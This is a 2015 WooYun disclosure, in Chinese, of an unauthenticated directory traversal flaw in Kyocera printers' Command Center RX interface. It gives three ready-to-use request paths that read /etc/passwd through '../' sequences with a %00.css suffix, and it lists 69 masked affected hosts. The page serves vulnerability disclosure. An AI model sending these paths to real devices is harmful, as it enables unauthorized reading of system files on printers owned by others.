当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152566

漏洞标题:京瓷打印机存在任意文件遍历漏洞(无需登录)

相关厂商:京瓷办公信息系统(中国)有限公司

漏洞作者: 路人甲

提交时间:2015-11-08 16:37

修复时间:2015-12-23 16:38

公开时间:2015-12-23 16:38

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

内置KYOCERA Command Center RX远程管理系统,由于没充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。
利用方式:

/js/../../../../../../../../etc/passwd%00.css
/startwlm/../../../../../../../../etc/passwd%00.css
/wlm/../../../../../../../../etc/passwd%00.css

漏洞证明:

案例中主要涉及用户来自台湾&香港地区

aaaaaaaaaaaaa2222222222222222222222.jpg


aaaaaaaaaaaaaaaaaaaa333333333333333333333.jpg


aaaaaaaaaaaaaaaaaaa4444444444444444444444.jpg


aaaaaaaaaaaaaaaaaaaa555555555555555555555.jpg


aaaaaaaaaaaaaaaaaaaaa666666666666666666.jpg


案例:

mask 区域
1.https://**.**.**/_
2.http://**.**.**/_
3.http://**.**.**/_
4.http://**.**.**/_
5.https://**.**.**/_
6.http://**.**.**/_
7.http://**.**.**/_
8.http://**.**.**/_
9.http://**.**.**/_
10.https://**.**.**/_
11.https://**.**.**/_
12.https://**.**.**/_
13.https://**.**.**/_
14.http://**.**.**/_
15.http://**.**.**/_
16.http://**.**.**/_
17.https://**.**.**/_
18.https://**.**.**/_
19.http://**.**.**/_
20.http://**.**.**/_
21.https://**.**.**/_
22.http://**.**.**/_
23.https://**.**.**/_
24.https://**.**.**/_
25.https://**.**.**/_
26.http://**.**.**/_
27.http://**.**.**/_
28.https://**.**.**/_
29.http://**.**.**/_
30.http://**.**.**/_
31.https://**.**.**/_
32.https://**.**.**/_
33.https://**.**.**/_
34.https://**.**.**/_
35.https://**.**.**/_
36.http://**.**.**/_
37.http://**.**.**/_
38.https://**.**.**/_
39.http://**.**.**/_
40.http://**.**.**/_
41.https://**.**.**/_
42.https://**.**.**/_
43.https://**.**.**/_
44.http://**.**.**/_
45.https://**.**.**/_
46.https://**.**.**/_
47.https://**.**.**/_
48.http://**.**.**/_
49.http://**.**.**/_
50.https://**.**.**/_
51.https://**.**.**/_
52.http://**.**.**/_
53.http://**.**.**/_
54.http://**.**.**/_
55.http://**.**.**/_
56.http://**.**.**/_
57.http://**.**.**/_
58.https://**.**.**/_
59.http://**.**.**/_
60.https://**.**.**/_
61.https://**.**.**/_
62.https://**.**.**/_
63.https://**.**.**/_
64.https://**.**.**/_
65.http://**.**.**/_
66.http://**.**.**/_
67.http://**.**.**/_
68.http://**.**.**/_
69.https://**.**.**

07/

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)